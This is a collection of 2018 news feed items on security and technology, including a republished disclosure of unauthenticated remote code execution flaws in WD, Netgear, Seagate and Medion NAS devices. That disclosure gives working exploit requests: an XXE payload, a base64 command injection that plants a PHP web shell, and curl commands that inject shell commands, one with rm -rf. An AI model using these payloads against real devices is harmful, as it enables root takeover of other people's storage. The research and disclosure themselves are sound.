News & Updates

Centers for Medicare and Medicaid Services announced hackers breached into a computer system that interacts with HealthCare.gov.

Hackers breached into a computer system that interacts with HealthCare.gov, according to Centers for Medicare and Medicaid Services, attackers accessed to the sensitive personal data of some 75,000 people.

After experts discovered the intrusion, the system was shut down and the IT staff is working to restore the operation.

“Officials said the hacked system was shut down and technicians are working to restore it before sign-up season starts Nov. 1 for health care coverage under the Affordable Care Act.” reported the Associated Press.

“The system that was hacked is used by insurance agents and brokers to directly enroll customers. All other sign-up systems are working.”

In the US, Barack Obama’s health care law ensured the private coverage for about 10 million people that in order to access the public service have to provide extensive personal information, including Social Security numbers, income, and citizenship or legal immigration status.

Starting November 1, people can log in to HealthCare.gov, fill out an application, and enroll in a 2019 Marketplace health plan.

HealthCare.gov

A spokesman for the Centers for Medicare and Medicaid declared that “nothing happened” to the HealthCare.gov website that is used by the general public.

“This concerns the agent and broker portal, which is not accessible to the general public,” he said.

Law enforcement is investigating the incident and notified affected customers that will receive free credit protection.

The post Hackers breached into system that interacts with HealthCare.gov appeared first on Security Affairs.

Source: Security affairs

Timeworn headstones in Donegal Cemetery.

Enlarge / Here lies an expert (maybe). (credit: Nicolas Raymond / Flickr)

There is a Climate Science Legal Defense Fund. Take a moment to consider the implications of that fact. The inhabitants of what, under other circumstances, would be an obscure academic backwater need legal defense. Non-scientists have convinced themselves so thoroughly that these experts have to be wrong that they claim the whole field is swimming in fraud and have engaged in legal assaults to try to confirm their beliefs. The scientists need legal defense because their opponents are convinced they can provide evidence of the fraud—if only they could see every email the scientists have ever sent.

Climate scientists may suffer from an extreme example of this sort of vilification, but they’re hardly alone. The US has had a long history of mistrust in highly educated professionals, but we seem to have shifted to a situation in which expertise has become both a disqualification and a reason for attack.

That’s the central argument of Tom Nichols’ recent book, The Death of Expertise, which has recently come out in a paperback edition. Nichols is a professor at the Naval War College and an expert himself, having done graduate studies about the former Soviet Union. While he’s gained some prominence as a never-Trump conservative, the arguments in his book are evenhanded at distributing blame. And they make disturbing reading for anyone in science who’s interested in engaging the public—especially in the science arena.

Read 8 remaining paragraphs | Comments

Source: http://feeds.arstechnica.com/arstechnica/index/

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      Ex-NASA contractor pleaded guilty for cyberstalking crimes
·      Expert released PoC Code Microsoft Edge Remote Code Execution flaw
·      Microsoft fixed the Zero-Day for JET flaw, but the fix is incomplete
·      A Russian cyber vigilante is patching outdated MikroTik routers exposed online
·      Branch.io Flaws may have affected as many as 685 million individuals
·      Online market for counterfeit goods in Russia has reached $1,5 billion
·      Russia-linked BlackEnergy backed new cyber attacks on Ukraines state bodies
·      35 million US voter records available for sale in a hacking forum
·      A simple message containing certain symbols could crash the Sony PlayStation 4
·      Expert disclosed a new passcode bypass to access photos and contacts on a locked iPhone
·      How Cybercriminals are Targeting free Wi-Fi Users?
·      Russia-linked APT group DustSquad targets diplomatic entities in Central Asia
·      A crippling ransomware attack hit a water utility in the aftermath of Hurricane Florence
·      Brazil expert discovers Oracle flaw that allows massive DDoS attacks
·      MartyMcFly Malware: new Cyber-Espionage Campaign targeting Italian Naval Industry
·      Thousands of servers easy to hack due to a LibSSH Flaw
·      VMware addressed Code Execution Flaw in its ESXi, Workstation, and Fusion products
·      Chaining three critical vulnerabilities allows takeover of D-Link routers
·      GreyEnergy cyberespionage group targets Poland and Ukraine
·      Group-IB: 14 cyber attacks on crypto exchanges resulted in a loss of $882 million
·      The author of the LuminosityLink RAT sentenced to 30 Months in Prison
·      Attackers behind Operation Oceansalt reuse code from Chinese Comment Crew
·      Drupal dev team fixed Remote Code Execution flaws in the popular CMS
·      Splunk addressed several vulnerabilities in Enterprise and Light products
·      Syrian victims of the GandCrab ransomware can decrypt their files for free
·      Thousands of applications affected by a zero-day issue in jQuery File Upload plugin

 

window._mNHandle = window._mNHandle || {};
window._mNHandle.queue = window._mNHandle.queue || [];
medianet_versionId = “3121199”;

try {
window._mNHandle.queue.push(function () {
window._mNDetails.loadTag(“762221962”, “300×250”, “762221962”);
});
}
catch (error) {}

Pierluigi Paganini

(Security Affairs – Newsletter)


The post Security Affairs newsletter Round 185 – News of the week appeared first on Security Affairs.

Source: Security affairs

Security researchers from WizCase have discovered several vulnerabilities in WD My Book, NetGear Stora, SeaGate Home, Medion LifeCloud NAS.

NAS devices have become the storage device of choice for many small and medium businesses (SMB). They are inexpensive, easy to operate, and you can add additional storage if you’re running low on space. But is it secure enough to protect your companies data? That was the question in our mind when we brought security researchers Paulos Yibelo and Daniel Eshetu to see if they could exploit any vulnerabilities in the leading NAS devices.

We focused on discovering only critical vulnerabilities that can be exploited remotely without any user interaction. Meaning, authentication bypasses weren’t enough. We wanted to execute commands on the devices remotely with the highest privileges. We were successful, in all the devices.

Summary of Our Findings

We used four popular NAS devices for this project

  1. WD My Book,
  2. NetGear Stora
  3. SeaGate Home
  4. Medion LifeCloud NAS

We successfully gained root remote command execution in the devices, and therefore the network they are on, simply by knowing their IP addresses.

  • All four NAS devices tested suffer from a zero-day unauthenticated root remote command execution (preauth RCE) vulnerabilities.
  • The vulnerabilities allow hackers, governments, or anyone with malicious intention to read files, add/remove users, add/modify existing data, or execute commands with highest privileges on all of the devices.
  • It is our belief that there are many other NAS devices that suffer from similar vulnerabilities as there seems to be a missing pattern of expected from NAS devices.
  • Both the vulnerabilities (dubbed CVE-2018-18472 and CVE-2018-18471) remain unpatched at the time of this publication.
  • There are nearly 2 million affected devices online

CVE-2018-18472 – XXE and Unauthenticated Remote Command Execution in Axentra Hipserv NAS firmware. 

Axentra Hipserv is a NAS OS that runs on multiple devices and provides cloud-based login and file storage and management functionalities for different devices. It’s used in different devices from different vendors, the affected devices sharing the firmware are:

  • Netgear Stora
  • Seagate GoFlex Home
  • Medion LifeCloud (maybe more).

The company provides a firmware with a web interface that mainly uses PHP as a serverside language. The web interface has a REST API endpoint and a typical web management interface with a file manager support.

Firmware Analysis.

After extracting the firmware and decoding the files, the php files were located in /var/www/html/ with the webroot in /var/www/html/html. The main handler for the web interface is homebase.php and RESTAPIController.php is the main handler for the rest API. All the php files were encrypted using IONCube which has a known public decoder and given the version used was an old one, decoding the files didn’t take long.

Part One: XXE

After decoding the files, most of the API endpoints and the web interface were not accessible without authentication. One of the few exceptions to this were a few endpoints in the REST API interface. One of those endpoints is located at /api/2.0/rest/aggregator/xml which loads xml data from POST data, although it uses DOMDocument for loading (parsing) the xml which should not be vulnerable to XXE attacks.

The version of libxml2 used as a backend in the firmware is an old one. This means that the external entity loading was not disabled by default. which opened the endpoint to exploitation. Through this it was possible to read files and perform SSRF attacks. An example request is given below

POST /api/2.0/rest/aggregator/xml HTTP/1.1
Host: 192.168.10.21
User-Agent: GoogleBot/2.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 246
Cookie: HOMEBASEID=c4be432f8add72db591aaa72c0fbbd34
Connection: close
Upgrade-Insecure-Requests: 1

<?xml version=”1.0″?>
<!DOCTYPE requests [
<!ELEMENT request (#PCDATA)>
<!ENTITY % dtd SYSTEM “http://192.168.10.20/XXE_CHECK”>
%dtd;
]>
<requests>
<request href=”/api/2.0/rest/3rdparty/facebook/” method=”GET”></request>
</requests>

The above request caused the xml parser to make a request to our server at 192.168.56.1 for the file XXE_CHECK. Although LFI was interesting to grab some sensitive files since XML can’t handle binary data it was not possible to dump the SQLite database to get usernames and passwords.

That meant we are able to read files and make SSRF requests in any of the below devices.

  • Netgear Stora
  • Seagate GoFlex Home
  • Medion LifeCloud

Part Two: RCE

Looking at how the web interface (REST API in particular) performed root actions was the next step. Since the web server runs as a non-root user and it had no sudo rights then it was found that the REST API makes calls to a local daemon named oe-spdwhich runs on port 2000 bound to 127.0.0.1.

The daemon takes XML data, parses the request and carries out the action without any authentication, except making sure the request came from 127.0.0.1. What’s more, the daemon skips over junk data until it finds the string <?xml version=”1.0″?> as shown in the IDA snippet below.

strstr(*input_data, “<?xml version=”1.0”?>”);

This made things a lot easier since the request is going to be sent using the HTTP protocol, skipping over junk data (according to the daemon) was a real help. But, since we can’t directly put the URL in the xml file we make the xml parser send a request to a php script (or anything that does the redirection really) that redirects it to http://127.0.0.1:2000/a.php?d=*payload here*.

Since the daemon is choke full of command execution bugs, it was easy to craft a request that triggered one. Additionally, since the daemon runs with root privileges it’s possible to perform any action on the device. An example payload is given below.

* This payload uploads a simple php shell /var/www/html/html/u.php (<device-ip>/u.php?cmd=id).

<?xml version=”1.0″?><proxy_request><command_name>usb</command_name><operation_name>eject</operation_name><parameter parameter_name=”disk”>a`echo PD9waHAKZWNobyAnPHByZT4nOwpzeXN0ZW0oJF9HRVRbJ2NtZCddKTsKZWNobyAnPC9wcmU+JzsKPz4K | base64 -d >/var/www/html/html/u.php`</parameter></proxy_request>

Putting it all together.

To chain the vulnerabilities seamlessly we need a server the device can make an outbound connection to and the following simple PHP script to redirect the parser to send the payload and handle a little multi-staging of payloads.

CVE-2018-18472 –WD MyBook Live Unauthenticated Remote Command Execution

WD MyBook Live and some models of WD MyCloud NAS contain a remotely exploitable vulnerability that lets anyone run commands on the device as root. The vulnerability exists in the language change and modifies functionality in the REST API, the following PoC demonstrates this flaw.

PoC:

curl –kX PUT  -d ‘language=en_US`<linx Command Here>`’  https://<NAS_IP>/api/1.0/rest/language_configuration

Examples:

curl –kX PUT  -d ‘language=en_US`id > /var/www/id.txt`’  https://<NAS_IP>/api/1.0/rest/language_configuration

The poc will create a id.txt file in the webroot containing the output of the ID command. The file can be removed using the following PoC

curl -kX PUT  -d ‘language=en_US`rm -rf /var/www/id.txt`’  https://<NAS_IP>/api/1.0/rest/language_configuration

What does this mean to the affected NAS users?

  • If you are using one of the above devices and they are connected on the WAN, make sure to remove your device from the internet. (Make sure they are running only locally in safe network)
  • Make sure to contact the affected vendors and insist they release a patch as soon possible!
  • We will update this article as a patch becomes available.
  • We also recommend you use a VPN to protect your computers and mobile devices from hackersExpressVPN and NordVPN both use AES 256-bit  encryption and will secure all your data. (This won’t protect from an NAS attack, but it will protect you from other cyber attacks)

The original report is available here.

WizCase Report: Vulnerabilities found on WD My Book, NetGear Stora, SeaGate Home, Medion LifeCloud NAS

Responses

WD:

The vulnerability report CVE-2018-18472 affects My Book Live devices originally introduced to the market between 2010 and 2012. These products have been discontinued since 2014 and are no longer covered under our device software support lifecycle. We encourage users who wish to continue operating these legacy products to configure their firewall to prevent remote access to these devices and to take measures to ensure that only trusted devices on the local network have access to the device.

Western Digital takes the security of our customers’ data seriously, and we provide security updates for our products to address issues from both external reports and regular security audits. Additionally, we welcome the opportunity to work with members of the security research community through responsible disclosure to help protect our users. Users who wish to find the latest security update for their Western Digital device may do so on our support portal at https://support.wdc.com. Security researchers who wish to contact Western Digital can find contact information as well as a PGP key at https://www.wdc.com/security/reporting.html.

 

About the authors:

WizCase Research Team 

Paulos Yibelo is a reputable security researcher who uncovered multiple security issues and leaks affecting major VPN providers last year, with number of severe IoT CVEs under his name.

Daniel Eshetu, an underground security researcher who previously made good remark on the NAS and IoT exploit development.

The post WizCase Report: Vulnerabilities found in WD My Book, NetGear Stora, SeaGate Home, Medion LifeCloud NAS appeared first on Security Affairs.

Source: Security affairs

One of the hacked websites, wifelovers.com, as it appeared on October 12.

Enlarge / One of the hacked websites, wifelovers.com, as it appeared on October 12. (credit: Internet Archive)

A recent hack of eight poorly secured adult websites has exposed megabytes of personal data that could be damaging to the people who shared pictures and other highly intimate information on the online message boards. Included in the leaked file are (1) IP addresses that connected to the sites, (2) user passwords protected by a four-decade-old cryptographic scheme, (3) names, and (4) 1.2 million unique email addresses, although it’s not clear how many of the addresses legitimately belonged to actual users.

Robert Angelini, the owner of wifelovers.com and the seven other breached sites, told Ars on Saturday morning that, in the 21 years they operated, fewer than 107,000 people posted to them. He said he didn’t know how or why the almost 98-megabyte file contained more than 12 times that many email addresses, and he hasn’t had time to examine a copy of the database that he received on Friday night.

Still, three days after receiving notification of the hack, Angelini finally confirmed the breach and took down the sites on early Saturday morning. A notice on the just-shuttered sites warns users to change passwords on other sites, especially if they match the passwords used on the hacked sites.

Read 15 remaining paragraphs | Comments

Source: http://feeds.arstechnica.com/arstechnica/index/

By Waqas

The IT security researcher at Cisco Talos Intelligence Group has discovered a critical remote code execution vulnerability in the LIVE555 media streaming library used by popular media players such as VLC and MPlayer. Maintained by the company Live Networks, the library works with RTP / RTCP, RTSP or SIP protocols, with the ability to process […]

This is a post from HackRead.com Read the original post: Watch out: MPlayer and VLC media player hit by critical vulnerability

Source: https://www.hackread.com/feed/

The developers of the GandCrab ransomware have released the decryption keys for all Syrian victims in an underground cybercrime forum.

The authors of the infamous GandCrab ransomware have released the decryption keys for all Syrian victims in an underground cybercrime forum.

gandcrab ransomware post underground

Gandcrab developers’ post – Source Bleeping Computer

The crooks decided to release the decryption keys after a Syrian Twitter user published a harrowing message asking for help after photos of his deceased children were encrypted by the ransomware.

The GandCrab developers explained that it was not their intention to infect Syrian users, their message on the hacking forum includes a link to a zip file containing the decryption keys for Syrian victims.

“This zip file contains the readme.txt in Russian language and SY_keys.txt files.  The readme.txt file contains information on how the key file is organized and information on why the keys were released.” states Bleeping Computer.

“The most important thing is not to indicate that he will help everyone. It will help only a citizen of Syria. Because of their political situation, economic and relations with the CIS countries. We regret that we did not initially add this country to the exceptions. But at least that way we can help them now.” reads the message from the author of the ransomware.

The SY_keys.txt file includes a list of 978 decryption keys for Syrian victims whose systems have been infected with GandCrab version 1.0 through 5.0.

Syrian victims that are not included in the file could receive the decryption keys by providing the GandCrab developers a picture of themselves, their passport, and their payment page. Providing crooks pictures of their passport is very risky, this kind of documents could be resold by the crooks or used by them for identity thefts.

Experts believe that security firms will develop a decryption tool based on the released encryption keys.

window._mNHandle = window._mNHandle || {};
window._mNHandle.queue = window._mNHandle.queue || [];
medianet_versionId = “3121199”;

try {
window._mNHandle.queue.push(function () {
window._mNDetails.loadTag(“762221962”, “300×250”, “762221962”);
});
}
catch (error) {}

Pierluigi Paganini

(Security Affairs – GandCrab ransomware, cybercrime)


The post Syrian victims of the GandCrab ransomware can decrypt their files for free appeared first on Security Affairs.

Source: Security affairs

Windows 10 during a product launch event in Tokyo in July 2015.

Enlarge / Windows 10 during a product launch event in Tokyo in July 2015. (credit: Kiyoshi Ota/Bloomberg via Getty Images)

It’s fair to say that the Windows 10 October 2018 Update has not been Microsoft’s most successful update. Reports of data loss quickly emerged, forcing Microsoft to suspend distribution of the update. It has since been fixed and is currently undergoing renewed testing pending a re-release.

This isn’t the first Windows feature update that’s had problems—we’ve seen things like significant hardware incompatibilities in previous updates—but it’s certainly the worst. While most of us know the theory of having backups, the reality is that lots of data, especially on home PCs, has no real backup, and deleting that data is thus disastrous.

Windows as a service

Microsoft’s ambition with Windows 10 was to radically shake up how it develops Windows 10. The company wanted to better respond to customer and market needs, and to put improved new features into customers’ hands sooner. Core to this was the notion that Windows 10 is the “last” version of Windows—all new development work will be an update to Windows 10, delivered through feature updates several times a year. This new development model was branded “Windows as a Service.” And after some initial fumbling, Microsoft settled on a cadence of two feature updates a year; one in April, one in October.

Read 49 remaining paragraphs | Comments

Source: http://feeds.arstechnica.com/arstechnica/index/

The Cambodian city of Angkor was once the largest in the world until vast swathes of the population decamped in the 15th century. Its famous temple, Angkor Wat (above), survived.

Enlarge / The Cambodian city of Angkor was once the largest in the world until vast swathes of the population decamped in the 15th century. Its famous temple, Angkor Wat (above), survived. (credit: Stefan Irvine/LightRocket/Getty Images)

The Cambodian city of Angkor was once the largest in the world… then the vast majority of its inhabitants suddenly decamped in the 15th century to a region near the modern city of Phnom Penh. Historians have put forth several theories about why this mass exodus occurred. A new paper in Science Advances argues that one major contributing factor was an overloaded water distribution system, exacerbated by extreme swings in the climate.

Angkor dates back to around 802 CE. Its vast network of canals, moats, embankments, and reservoirs developed over the next 600 years, helping distribute vital water resources for such uses as irrigation and to help control occasional flooding. By the end of the 11th century, the system bore all the features of a complex network, with thousands of interconnected individual components heavily dependent on each other.

Such a configuration, hovering at or near the so-called critical point, is ideal for the effective flow of resources, whether we’re talking about water, electricity (power grids), traffic, the spread of disease, or information (the stock market and the Internet). The tradeoff is that it can become much more sensitive to even tiny perturbations—so much so that a small outage in one part of the network can trigger a sudden network-wide cascading failure.

Read 6 remaining paragraphs | Comments

Source: http://feeds.arstechnica.com/arstechnica/index/

Review: Istanbul: The Dice Game rules the bazaar

Enlarge (credit: Nate Anderson)

Welcome to Ars Cardboard, our weekend look at tabletop games! Check out our complete board gaming coverage at cardboard.arstechnica.com.

When it comes to gaming, I am a man of simple pleasures. I need no boxes of sculpted minis, no hour-long setup, no manuals the size of novels. Let me chuck huge handfuls of dice, collect colorful goods, earn chunky gems, and I am content. Wrap the whole package in elegant artwork with a clear ruleset and a low price, and I am ready to play, anytime, anywhere.

That’s why I love Istanbul: The Dice Game, the (inevitable) dice-driven implementation of 2014’s award-winning board game, Istanbul. In that earlier big-box game, players moved their “merchants” around the “bazaar” to collect and trade goods, or to gamble in the tea shop, or to spring a relative from jail and send him on an errand for you. (Don’t ask.) The goal was to collect enough shiny acrylic rubies to retire rich.

Read 14 remaining paragraphs | Comments

Source: http://feeds.arstechnica.com/arstechnica/index/